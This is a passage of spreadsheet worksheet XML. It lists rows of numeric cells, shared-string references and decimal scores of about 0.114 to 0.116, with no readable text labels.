      <c r="E26405" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26405" s="2">
        <v>0.1159844054580896</v>
      </c>
    </row>
    <row r="26406" ht="15.75" customHeight="1">
      <c r="A26406" s="1">
        <v>21967.0</v>
      </c>
      <c r="B26406" s="2">
        <v>2.9097406E7</v>
      </c>
      <c r="C26406" s="2" t="s">
        <v>25389</v>
      </c>
      <c r="D26406" s="2">
        <v>1.0</v>
      </c>
      <c r="E26406" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26406" s="2">
        <v>0.1159844054580896</v>
      </c>
    </row>
    <row r="26407" ht="15.75" customHeight="1">
      <c r="A26407" s="1">
        <v>28858.0</v>
      </c>
      <c r="B26407" s="2">
        <v>2.9034481E7</v>
      </c>
      <c r="C26407" s="2" t="s">
        <v>25390</v>
      </c>
      <c r="D26407" s="2">
        <v>1.0</v>
      </c>
      <c r="E26407" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26407" s="2">
        <v>0.1159844054580896</v>
      </c>
    </row>
    <row r="26408" ht="15.75" customHeight="1">
      <c r="A26408" s="1">
        <v>33005.0</v>
      </c>
      <c r="B26408" s="2">
        <v>6631432.0</v>
      </c>
      <c r="C26408" s="2" t="s">
        <v>25390</v>
      </c>
      <c r="D26408" s="2">
        <v>1.0</v>
      </c>
      <c r="E26408" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26408" s="2">
        <v>0.1159844054580896</v>
      </c>
    </row>
    <row r="26409" ht="15.75" customHeight="1">
      <c r="A26409" s="1">
        <v>14537.0</v>
      </c>
      <c r="B26409" s="2">
        <v>3.9869238E7</v>
      </c>
      <c r="C26409" s="2" t="s">
        <v>25391</v>
      </c>
      <c r="D26409" s="2">
        <v>1.0</v>
      </c>
      <c r="E26409" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26409" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="26410" ht="15.75" customHeight="1">
      <c r="A26410" s="1">
        <v>34234.0</v>
      </c>
      <c r="B26410" s="2">
        <v>4729880.0</v>
      </c>
      <c r="C26410" s="2" t="s">
        <v>25392</v>
      </c>
      <c r="D26410" s="2">
        <v>1.0</v>
      </c>
      <c r="E26410" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26410" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="26411" ht="15.75" customHeight="1">
      <c r="A26411" s="1">
        <v>34237.0</v>
      </c>
      <c r="B26411" s="2">
        <v>4730827.0</v>
      </c>
      <c r="C26411" s="2" t="s">
        <v>25393</v>
      </c>
      <c r="D26411" s="2">
        <v>1.0</v>
      </c>
      <c r="E26411" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26411" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="26412" ht="15.75" customHeight="1">
      <c r="A26412" s="1">
        <v>5662.0</v>
      </c>
      <c r="B26412" s="2">
        <v>4.6314113E7</v>
      </c>
      <c r="C26412" s="2" t="s">
        <v>25394</v>
      </c>
      <c r="D26412" s="2">
        <v>1.0</v>
      </c>
      <c r="E26412" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26412" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="26413" ht="15.75" customHeight="1">
      <c r="A26413" s="1">
        <v>3489.0</v>
      </c>
      <c r="B26413" s="2">
        <v>3.8454146E7</v>
      </c>
      <c r="C26413" s="2" t="s">
        <v>25395</v>
      </c>
      <c r="D26413" s="2">
        <v>1.0</v>
      </c>
      <c r="E26413" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26413" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="26414" ht="15.75" customHeight="1">
      <c r="A26414" s="1">
        <v>16770.0</v>
      </c>
      <c r="B26414" s="2">
        <v>4.768286E7</v>
      </c>
      <c r="C26414" s="2" t="s">
        <v>25396</v>
      </c>
      <c r="D26414" s="2">
        <v>1.0</v>
      </c>
      <c r="E26414" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26414" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="26415" ht="15.75" customHeight="1">
      <c r="A26415" s="1">
        <v>29152.0</v>
      </c>
      <c r="B26415" s="2">
        <v>3.0589322E7</v>
      </c>
      <c r="C26415" s="2" t="s">
        <v>25397</v>
      </c>
      <c r="D26415" s="2">
        <v>1.0</v>
      </c>
      <c r="E26415" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26415" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="26416" ht="15.75" customHeight="1">
      <c r="A26416" s="1">
        <v>17601.0</v>
      </c>
      <c r="B26416" s="2">
        <v>5.0351193E7</v>
      </c>
      <c r="C26416" s="2" t="s">
        <v>25398</v>
      </c>
      <c r="D26416" s="2">
        <v>1.0</v>
      </c>
      <c r="E26416" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26416" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="26417" ht="15.75" customHeight="1">
      <c r="A26417" s="1">
        <v>33229.0</v>
      </c>
      <c r="B26417" s="2">
        <v>7270758.0</v>
      </c>
      <c r="C26417" s="2" t="s">
        <v>25399</v>
      </c>
      <c r="D26417" s="2">
        <v>1.0</v>
      </c>
      <c r="E26417" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26417" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="26418" ht="15.75" customHeight="1">
      <c r="A26418" s="1">
        <v>1844.0</v>
      </c>
      <c r="B26418" s="2">
        <v>2.9407894E7</v>
      </c>
      <c r="C26418" s="2" t="s">
        <v>25400</v>
      </c>
      <c r="D26418" s="2">
        <v>1.0</v>
      </c>
      <c r="E26418" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26418" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="26419" ht="15.75" customHeight="1">
      <c r="A26419" s="1">
        <v>32776.0</v>
      </c>
      <c r="B26419" s="2">
        <v>6102694.0</v>
      </c>
      <c r="C26419" s="2" t="s">
        <v>25401</v>
      </c>
      <c r="D26419" s="2">
        <v>1.0</v>
      </c>
      <c r="E26419" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26419" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="26420" ht="15.75" customHeight="1">
      <c r="A26420" s="1">
        <v>1276.0</v>
      </c>
      <c r="B26420" s="2">
        <v>2.5467425E7</v>
      </c>
      <c r="C26420" s="2" t="s">
        <v>25402</v>
      </c>
      <c r="D26420" s="2">
        <v>1.0</v>
      </c>
      <c r="E26420" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26420" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="26421" ht="15.75" customHeight="1">
      <c r="A26421" s="1">
        <v>4307.0</v>
      </c>
      <c r="B26421" s="2">
        <v>4.1958357E7</v>
      </c>
      <c r="C26421" s="2" t="s">
        <v>25403</v>
      </c>
      <c r="D26421" s="2">
        <v>1.0</v>
      </c>
      <c r="E26421" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26421" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="26422" ht="15.75" customHeight="1">
      <c r="A26422" s="1">
        <v>8951.0</v>
      </c>
      <c r="B26422" s="2">
        <v>5.4924733E7</v>
      </c>
      <c r="C26422" s="2" t="s">
        <v>25404</v>
      </c>
      <c r="D26422" s="2">
        <v>1.0</v>
      </c>
      <c r="E26422" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26422" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="26423" ht="15.75" customHeight="1">
      <c r="A26423" s="1">
        <v>10457.0</v>
      </c>
      <c r="B26423" s="2">
        <v>1.0671827E7</v>
      </c>
      <c r="C26423" s="2" t="s">
        <v>25405</v>
      </c>
      <c r="D26423" s="2">
        <v>1.0</v>
      </c>
      <c r="E26423" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26423" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="26424" ht="15.75" customHeight="1">
      <c r="A26424" s="1">
        <v>11991.0</v>
      </c>
      <c r="B26424" s="2">
        <v>2.5870911E7</v>
      </c>
      <c r="C26424" s="2" t="s">
        <v>25406</v>
      </c>
      <c r="D26424" s="2">
        <v>1.0</v>
      </c>
      <c r="E26424" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26424" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="26425" ht="15.75" customHeight="1">
      <c r="A26425" s="1">
        <v>21795.0</v>
      </c>
      <c r="B26425" s="2">
        <v>2.6633145E7</v>
      </c>
      <c r="C26425" s="2" t="s">
        <v>25407</v>
      </c>
      <c r="D26425" s="2">
        <v>1.0</v>
      </c>
      <c r="E26425" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26425" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="26426" ht="15.75" customHeight="1">
      <c r="A26426" s="1">
        <v>23461.0</v>
      </c>
      <c r="B26426" s="2">
        <v>5700920.0</v>
      </c>
      <c r="C26426" s="2" t="s">
        <v>11953</v>
      </c>
      <c r="D26426" s="2">
        <v>1.0</v>
      </c>
      <c r="E26426" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26426" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="26427" ht="15.75" customHeight="1">
      <c r="A26427" s="1">
        <v>24907.0</v>
      </c>
      <c r="B26427" s="2">
        <v>1.231121E7</v>
      </c>
      <c r="C26427" s="2" t="s">
        <v>25408</v>
      </c>
      <c r="D26427" s="2">
        <v>1.0</v>
      </c>
      <c r="E26427" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26427" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="26428" ht="15.75" customHeight="1">
      <c r="A26428" s="1">
        <v>33059.0</v>
      </c>
      <c r="B26428" s="2">
        <v>6826175.0</v>
      </c>
      <c r="C26428" s="2" t="s">
        <v>25409</v>
      </c>
      <c r="D26428" s="2">
        <v>1.0</v>
      </c>
      <c r="E26428" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26428" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="26429" ht="15.75" customHeight="1">
      <c r="A26429" s="1">
        <v>24234.0</v>
      </c>
      <c r="B26429" s="2">
        <v>1.0462108E7</v>
      </c>
      <c r="C26429" s="2" t="s">
        <v>25410</v>
      </c>
      <c r="D26429" s="2">
        <v>1.0</v>
      </c>
      <c r="E26429" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26429" s="2">
        <v>0.1155202821869489</v>
      </c>
    </row>
    <row r="26430" ht="15.75" customHeight="1">
      <c r="A26430" s="1">
        <v>26119.0</v>
      </c>
      <c r="B26430" s="2">
        <v>1.5884687E7</v>
      </c>
      <c r="C26430" s="2" t="s">
        <v>25411</v>
      </c>
      <c r="D26430" s="2">
        <v>1.0</v>
      </c>
      <c r="E26430" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26430" s="2">
        <v>0.1154513888888889</v>
      </c>
    </row>
    <row r="26431" ht="15.75" customHeight="1">
      <c r="A26431" s="1">
        <v>29423.0</v>
      </c>
      <c r="B26431" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C26431" s="2" t="s">
        <v>25412</v>
      </c>
      <c r="D26431" s="2">
        <v>1.0</v>
      </c>
      <c r="E26431" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26431" s="2">
        <v>0.1154513888888889</v>
      </c>
    </row>
    <row r="26432" ht="15.75" customHeight="1">
      <c r="A26432" s="1">
        <v>29564.0</v>
      </c>
      <c r="B26432" s="2">
        <v>3.3217498E7</v>
      </c>
      <c r="C26432" s="2" t="s">
        <v>25413</v>
      </c>
      <c r="D26432" s="2">
        <v>1.0</v>
      </c>
      <c r="E26432" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26432" s="2">
        <v>0.1154513888888889</v>
      </c>
    </row>
    <row r="26433" ht="15.75" customHeight="1">
      <c r="A26433" s="1">
        <v>5496.0</v>
      </c>
      <c r="B26433" s="2">
        <v>4.5799473E7</v>
      </c>
      <c r="C26433" s="2" t="s">
        <v>25414</v>
      </c>
      <c r="D26433" s="2">
        <v>1.0</v>
      </c>
      <c r="E26433" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26433" s="2">
        <v>0.1153846153846154</v>
      </c>
    </row>
    <row r="26434" ht="15.75" customHeight="1">
      <c r="A26434" s="1">
        <v>31647.0</v>
      </c>
      <c r="B26434" s="2">
        <v>5.1573207E7</v>
      </c>
      <c r="C26434" s="2" t="s">
        <v>25415</v>
      </c>
      <c r="D26434" s="2">
        <v>1.0</v>
      </c>
      <c r="E26434" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26434" s="2">
        <v>0.1153846153846154</v>
      </c>
    </row>
    <row r="26435" ht="15.75" customHeight="1">
      <c r="A26435" s="1">
        <v>454.0</v>
      </c>
      <c r="B26435" s="2">
        <v>1.7228897E7</v>
      </c>
      <c r="C26435" s="2" t="s">
        <v>25416</v>
      </c>
      <c r="D26435" s="2">
        <v>1.0</v>
      </c>
      <c r="E26435" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26435" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="26436" ht="15.75" customHeight="1">
      <c r="A26436" s="1">
        <v>2101.0</v>
      </c>
      <c r="B26436" s="2">
        <v>3.130418E7</v>
      </c>
      <c r="C26436" s="2" t="s">
        <v>25417</v>
      </c>
      <c r="D26436" s="2">
        <v>1.0</v>
      </c>
      <c r="E26436" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26436" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="26437" ht="15.75" customHeight="1">
      <c r="A26437" s="1">
        <v>4192.0</v>
      </c>
      <c r="B26437" s="2">
        <v>4.1582679E7</v>
      </c>
      <c r="C26437" s="2" t="s">
        <v>25418</v>
      </c>
      <c r="D26437" s="2">
        <v>1.0</v>
      </c>
      <c r="E26437" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26437" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="26438" ht="15.75" customHeight="1">
      <c r="A26438" s="1">
        <v>6903.0</v>
      </c>
      <c r="B26438" s="2">
        <v>4.9810528E7</v>
      </c>
      <c r="C26438" s="2" t="s">
        <v>25419</v>
      </c>
      <c r="D26438" s="2">
        <v>1.0</v>
      </c>
      <c r="E26438" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26438" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="26439" ht="15.75" customHeight="1">
      <c r="A26439" s="1">
        <v>10632.0</v>
      </c>
      <c r="B26439" s="2">
        <v>1.4015837E7</v>
      </c>
      <c r="C26439" s="2" t="s">
        <v>25420</v>
      </c>
      <c r="D26439" s="2">
        <v>1.0</v>
      </c>
      <c r="E26439" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26439" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="26440" ht="15.75" customHeight="1">
      <c r="A26440" s="1">
        <v>10965.0</v>
      </c>
      <c r="B26440" s="2">
        <v>1.7232319E7</v>
      </c>
      <c r="C26440" s="2" t="s">
        <v>25421</v>
      </c>
      <c r="D26440" s="2">
        <v>1.0</v>
      </c>
      <c r="E26440" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26440" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="26441" ht="15.75" customHeight="1">
      <c r="A26441" s="1">
        <v>20577.0</v>
      </c>
      <c r="B26441" s="2">
        <v>1.3636581E7</v>
      </c>
      <c r="C26441" s="2" t="s">
        <v>25422</v>
      </c>
      <c r="D26441" s="2">
        <v>1.0</v>
      </c>
      <c r="E26441" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26441" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="26442" ht="15.75" customHeight="1">
      <c r="A26442" s="1">
        <v>4469.0</v>
      </c>
      <c r="B26442" s="2">
        <v>4.2464245E7</v>
      </c>
      <c r="C26442" s="2" t="s">
        <v>25423</v>
      </c>
      <c r="D26442" s="2">
        <v>1.0</v>
      </c>
      <c r="E26442" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26442" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26443" ht="15.75" customHeight="1">
      <c r="A26443" s="1">
        <v>6781.0</v>
      </c>
      <c r="B26443" s="2">
        <v>4.9475022E7</v>
      </c>
      <c r="C26443" s="2" t="s">
        <v>25424</v>
      </c>
      <c r="D26443" s="2">
        <v>1.0</v>
      </c>
      <c r="E26443" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26443" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26444" ht="15.75" customHeight="1">
      <c r="A26444" s="1">
        <v>7811.0</v>
      </c>
      <c r="B26444" s="2">
        <v>5.2254649E7</v>
      </c>
      <c r="C26444" s="2" t="s">
        <v>25425</v>
      </c>
      <c r="D26444" s="2">
        <v>1.0</v>
      </c>
      <c r="E26444" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26444" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26445" ht="15.75" customHeight="1">
      <c r="A26445" s="1">
        <v>10684.0</v>
      </c>
      <c r="B26445" s="2">
        <v>1.4667967E7</v>
      </c>
      <c r="C26445" s="2" t="s">
        <v>25426</v>
      </c>
      <c r="D26445" s="2">
        <v>1.0</v>
      </c>
      <c r="E26445" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26445" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26446" ht="15.75" customHeight="1">
      <c r="A26446" s="1">
        <v>13927.0</v>
      </c>
      <c r="B26446" s="2">
        <v>3.7101842E7</v>
      </c>
      <c r="C26446" s="2" t="s">
        <v>25427</v>
      </c>
      <c r="D26446" s="2">
        <v>1.0</v>
      </c>
      <c r="E26446" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26446" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26447" ht="15.75" customHeight="1">
      <c r="A26447" s="1">
        <v>14694.0</v>
      </c>
      <c r="B26447" s="2">
        <v>4.0558152E7</v>
      </c>
      <c r="C26447" s="2" t="s">
        <v>25428</v>
      </c>
      <c r="D26447" s="2">
        <v>1.0</v>
      </c>
      <c r="E26447" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26447" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26448" ht="15.75" customHeight="1">
      <c r="A26448" s="1">
        <v>15658.0</v>
      </c>
      <c r="B26448" s="2">
        <v>4.3669525E7</v>
      </c>
      <c r="C26448" s="2" t="s">
        <v>25429</v>
      </c>
      <c r="D26448" s="2">
        <v>1.0</v>
      </c>
      <c r="E26448" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26448" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26449" ht="15.75" customHeight="1">
      <c r="A26449" s="1">
        <v>16002.0</v>
      </c>
      <c r="B26449" s="2">
        <v>4.4969641E7</v>
      </c>
      <c r="C26449" s="2" t="s">
        <v>25430</v>
      </c>
      <c r="D26449" s="2">
        <v>1.0</v>
      </c>
      <c r="E26449" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26449" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26450" ht="15.75" customHeight="1">
      <c r="A26450" s="1">
        <v>16022.0</v>
      </c>
      <c r="B26450" s="2">
        <v>4.5063924E7</v>
      </c>
      <c r="C26450" s="2" t="s">
        <v>25431</v>
      </c>
      <c r="D26450" s="2">
        <v>1.0</v>
      </c>
      <c r="E26450" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26450" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26451" ht="15.75" customHeight="1">
      <c r="A26451" s="1">
        <v>17087.0</v>
      </c>
      <c r="B26451" s="2">
        <v>4.8641401E7</v>
      </c>
      <c r="C26451" s="2" t="s">
        <v>25432</v>
      </c>
      <c r="D26451" s="2">
        <v>1.0</v>
      </c>
      <c r="E26451" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26451" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26452" ht="15.75" customHeight="1">
      <c r="A26452" s="1">
        <v>20843.0</v>
      </c>
      <c r="B26452" s="2">
        <v>1.5655269E7</v>
      </c>
      <c r="C26452" s="2" t="s">
        <v>25433</v>
      </c>
      <c r="D26452" s="2">
        <v>1.0</v>
      </c>
      <c r="E26452" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26452" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26453" ht="15.75" customHeight="1">
      <c r="A26453" s="1">
        <v>22579.0</v>
      </c>
      <c r="B26453" s="2">
        <v>3.8795868E7</v>
      </c>
      <c r="C26453" s="2" t="s">
        <v>25434</v>
      </c>
      <c r="D26453" s="2">
        <v>1.0</v>
      </c>
      <c r="E26453" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26453" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26454" ht="15.75" customHeight="1">
      <c r="A26454" s="1">
        <v>23500.0</v>
      </c>
      <c r="B26454" s="2">
        <v>5.7708242E7</v>
      </c>
      <c r="C26454" s="2" t="s">
        <v>25435</v>
      </c>
      <c r="D26454" s="2">
        <v>1.0</v>
      </c>
      <c r="E26454" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26454" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26455" ht="15.75" customHeight="1">
      <c r="A26455" s="1">
        <v>23834.0</v>
      </c>
      <c r="B26455" s="2">
        <v>8090669.0</v>
      </c>
      <c r="C26455" s="2" t="s">
        <v>25436</v>
      </c>
      <c r="D26455" s="2">
        <v>1.0</v>
      </c>
      <c r="E26455" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26455" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26456" ht="15.75" customHeight="1">
      <c r="A26456" s="1">
        <v>25516.0</v>
      </c>
      <c r="B26456" s="2">
        <v>1.4192391E7</v>
      </c>
      <c r="C26456" s="2" t="s">
        <v>25343</v>
      </c>
      <c r="D26456" s="2">
        <v>1.0</v>
      </c>
      <c r="E26456" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26456" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26457" ht="15.75" customHeight="1">
      <c r="A26457" s="1">
        <v>25726.0</v>
      </c>
      <c r="B26457" s="2">
        <v>1.4541555E7</v>
      </c>
      <c r="C26457" s="2" t="s">
        <v>25437</v>
      </c>
      <c r="D26457" s="2">
        <v>1.0</v>
      </c>
      <c r="E26457" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26457" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26458" ht="15.75" customHeight="1">
      <c r="A26458" s="1">
        <v>32832.0</v>
      </c>
      <c r="B26458" s="2">
        <v>6240383.0</v>
      </c>
      <c r="C26458" s="2" t="s">
        <v>25438</v>
      </c>
      <c r="D26458" s="2">
        <v>1.0</v>
      </c>
      <c r="E26458" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26458" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26459" ht="15.75" customHeight="1">
      <c r="A26459" s="1">
        <v>33602.0</v>
      </c>
      <c r="B26459" s="2">
        <v>8340295.0</v>
      </c>
      <c r="C26459" s="2" t="s">
        <v>25439</v>
      </c>
      <c r="D26459" s="2">
        <v>1.0</v>
      </c>
      <c r="E26459" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26459" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="26460" ht="15.75" customHeight="1">
      <c r="A26460" s="1">
        <v>747.0</v>
      </c>
      <c r="B26460" s="2">
        <v>2.0887896E7</v>
      </c>
      <c r="C26460" s="2" t="s">
        <v>25440</v>
      </c>
      <c r="D26460" s="2">
        <v>1.0</v>
      </c>
      <c r="E26460" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26460" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26461" ht="15.75" customHeight="1">
      <c r="A26461" s="1">
        <v>1273.0</v>
      </c>
      <c r="B26461" s="2">
        <v>2.532228E7</v>
      </c>
      <c r="C26461" s="2" t="s">
        <v>25441</v>
      </c>
      <c r="D26461" s="2">
        <v>1.0</v>
      </c>
      <c r="E26461" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26461" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26462" ht="15.75" customHeight="1">
      <c r="A26462" s="1">
        <v>1473.0</v>
      </c>
      <c r="B26462" s="2">
        <v>2.7070427E7</v>
      </c>
      <c r="C26462" s="2" t="s">
        <v>25442</v>
      </c>
      <c r="D26462" s="2">
        <v>1.0</v>
      </c>
      <c r="E26462" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26462" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26463" ht="15.75" customHeight="1">
      <c r="A26463" s="1">
        <v>2164.0</v>
      </c>
      <c r="B26463" s="2">
        <v>3.176271E7</v>
      </c>
      <c r="C26463" s="2" t="s">
        <v>25443</v>
      </c>
      <c r="D26463" s="2">
        <v>1.0</v>
      </c>
      <c r="E26463" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26463" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26464" ht="15.75" customHeight="1">
      <c r="A26464" s="1">
        <v>2560.0</v>
      </c>
      <c r="B26464" s="2">
        <v>3.4234217E7</v>
      </c>
      <c r="C26464" s="2" t="s">
        <v>25444</v>
      </c>
      <c r="D26464" s="2">
        <v>1.0</v>
      </c>
      <c r="E26464" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26464" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26465" ht="15.75" customHeight="1">
      <c r="A26465" s="1">
        <v>2831.0</v>
      </c>
      <c r="B26465" s="2">
        <v>3.5419314E7</v>
      </c>
      <c r="C26465" s="2" t="s">
        <v>25445</v>
      </c>
      <c r="D26465" s="2">
        <v>1.0</v>
      </c>
      <c r="E26465" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26465" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26466" ht="15.75" customHeight="1">
      <c r="A26466" s="1">
        <v>3095.0</v>
      </c>
      <c r="B26466" s="2">
        <v>3.6689024E7</v>
      </c>
      <c r="C26466" s="2" t="s">
        <v>25446</v>
      </c>
      <c r="D26466" s="2">
        <v>1.0</v>
      </c>
      <c r="E26466" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26466" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26467" ht="15.75" customHeight="1">
      <c r="A26467" s="1">
        <v>3952.0</v>
      </c>
      <c r="B26467" s="2">
        <v>4.0673544E7</v>
      </c>
      <c r="C26467" s="2" t="s">
        <v>25447</v>
      </c>
      <c r="D26467" s="2">
        <v>1.0</v>
      </c>
      <c r="E26467" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26467" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26468" ht="15.75" customHeight="1">
      <c r="A26468" s="1">
        <v>5121.0</v>
      </c>
      <c r="B26468" s="2">
        <v>4.4577224E7</v>
      </c>
      <c r="C26468" s="2" t="s">
        <v>25448</v>
      </c>
      <c r="D26468" s="2">
        <v>1.0</v>
      </c>
      <c r="E26468" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26468" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26469" ht="15.75" customHeight="1">
      <c r="A26469" s="1">
        <v>5354.0</v>
      </c>
      <c r="B26469" s="2">
        <v>4.5366292E7</v>
      </c>
      <c r="C26469" s="2" t="s">
        <v>25449</v>
      </c>
      <c r="D26469" s="2">
        <v>1.0</v>
      </c>
      <c r="E26469" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26469" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26470" ht="15.75" customHeight="1">
      <c r="A26470" s="1">
        <v>5825.0</v>
      </c>
      <c r="B26470" s="2">
        <v>4.6885322E7</v>
      </c>
      <c r="C26470" s="2" t="s">
        <v>25450</v>
      </c>
      <c r="D26470" s="2">
        <v>1.0</v>
      </c>
      <c r="E26470" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26470" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26471" ht="15.75" customHeight="1">
      <c r="A26471" s="1">
        <v>5829.0</v>
      </c>
      <c r="B26471" s="2">
        <v>4.6893731E7</v>
      </c>
      <c r="C26471" s="2" t="s">
        <v>25451</v>
      </c>
      <c r="D26471" s="2">
        <v>1.0</v>
      </c>
      <c r="E26471" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26471" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26472" ht="15.75" customHeight="1">
      <c r="A26472" s="1">
        <v>6185.0</v>
      </c>
      <c r="B26472" s="2">
        <v>4.7908068E7</v>
      </c>
      <c r="C26472" s="2" t="s">
        <v>25452</v>
      </c>
      <c r="D26472" s="2">
        <v>1.0</v>
      </c>
      <c r="E26472" s="3" t="s">
